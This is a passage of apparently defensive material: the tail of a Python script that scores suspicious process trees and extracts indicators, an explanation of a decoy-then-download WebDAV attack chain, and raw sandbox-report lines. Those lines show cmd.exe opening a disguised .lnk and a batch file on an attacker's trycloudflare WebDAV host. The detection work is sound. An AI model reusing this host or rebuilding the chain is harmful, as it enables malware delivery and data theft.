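            "score": total,
            "alert": total >= ALERT_THRESHOLD,
        }
    return result

def extract_iocs(events):
    """Tunnel hostnames, fetched URLs and files written by the chain."""
    iocs = {"hosts": set(), "urls": set(), "dropped": set()}
    for e in events:
        c = e["cmdline"]
        iocs["hosts"].update(h.lower() for h in HOST_RX.findall(c))
        iocs["hosts"].update(h.lower() for h in UNC_HOST_RX.findall(c))
        iocs["urls"].update(URL_RX.findall(c))
        iocs["dropped"].update(OUTFILE_RX.findall(c))
    return iocs

if __name__ == "__main__":
    for pid, r in triage(SAMPLE_EVENTS).items():
        flag = "ALERT" if r["alert"] else "     "
        print(f"{flag} pid={pid:<3} {r['image']:<16} score={r['score']:<3} {','.join(r['rules'])}")
    for kind, values in extract_iocs(SAMPLE_EVENTS).items():
        print(f"{kind}: {sorted(values)}")
```

The inherited half-score is the point of the tree walk: Acrobat.exe opening a PDF and timeout /t 5 are harmless on their own and match no rule, but as children of a cmd.exe that itself ran off a WebDAV share through a hidden PowerShell they are part of the decoy-then-download pattern and are raised with it, while the benign PowerShell and the plain SMB dir under explorer.exe stay at zero.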
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation

Stealing of Sensitive Information

Source: C:\Windows\System32\cmd.exe File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\
Source: C:\Windows\System32\conhost.exe File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE\bestellung-DKM00392pdf.lnk
Source: C:\Windows\System32\conhost.exe File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\DE
Source: C:\Windows\System32\cmd.exe File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat
Source: C:\Windows\System32\cmd.exe File opened: \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\